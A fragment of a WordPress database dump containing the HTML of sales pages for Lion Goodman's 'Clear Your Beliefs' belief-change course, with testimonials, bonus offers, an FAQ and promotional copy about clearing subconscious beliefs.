src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 16:41:10', '2014-06-17 21:41:10', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(944, 4194, '2014-06-17 16:46:00', '2014-06-17 21:46:00', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" were created by your beliefs.\r\nWhen you learn to change your beliefs at will, your possibilities are unlimited!</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\nDuring the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" 